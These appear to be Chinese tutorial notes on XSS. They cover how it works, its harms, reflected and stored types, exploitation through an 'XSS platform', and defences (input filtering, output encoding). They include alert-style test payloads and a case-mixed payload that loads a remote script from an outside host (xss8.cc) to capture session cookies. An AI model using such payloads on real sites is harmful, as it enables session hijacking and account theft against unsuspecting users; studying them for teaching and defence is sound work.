XSS注入原理
XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 XSS 攻击。
XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。
<script>alert(/XSS/)</script>
<script>console.log(1);</script>
<a href=javascript:alert(1)>
<a href='javascript:alert(1)'>aa</a>
XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。
关键点:我们输入的内容一定要是前端代码。
我们能输入的地方:
①.网站给我们提供的框框(搜索框)
②.网址的参数的值
XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。
<font color='#ff6600'>非注册会员不可设</font>
<script>alert(/cccccccccccc/)</script> # 作用:弹框
前端代码:html、css、【javascript】。
XSS的危害:
1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
3、盗窃企业重要的具有商业价值的资料
4、非法转账
5、强制发送电子邮件(钓鱼)
6、网站挂马
7、控制受害者机器(肉鸡)向其它网站发起攻击
XSS分类
反射型的XSS:你输入的前端代码只执行了一次的就叫做反射型的XSS。
存储型的XSS:你输入的前端代码被目标网站存进了数据库里面,导致其他用户访问一次执行一次。
XSS平台——漏洞利用
XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。
无keepsession:半个小时,Cookie失效就失效了。
keepsession:保持Cookie的有效性。
</tExtArEa>'"><sCRiPt sRC=//xss8.cc/OAL5></sCrIpT>
短网址的方式
总结
1.XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。
2.XSS分类:反射型的XSS、【存储型的XSS】
3.XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。
答疑
1.&是什么?
keyword=你懂得&enc=utf-8&wq=XSS&pvid=50ff619dd1314c188a33df5ded7b6842
& 相当于 “和”/ and
2.里面的斜杠是双单引号?
语法格式
3.没有授权咋实战?
只能打靶
4.为什么第一次不行,这次好了。问题出在哪里?
复制的时候出了问题。
beef就是一个利用XSS漏洞的工具。
5.可以直接以QQ号主模式登录他QQ空间不?
XSS漏洞还是偏向于社工型。理论上是可以的。
6.那xss怎么去防范呢?
控制输入和输出。
开发人员应该该做的
输入处过滤。
输出处编码。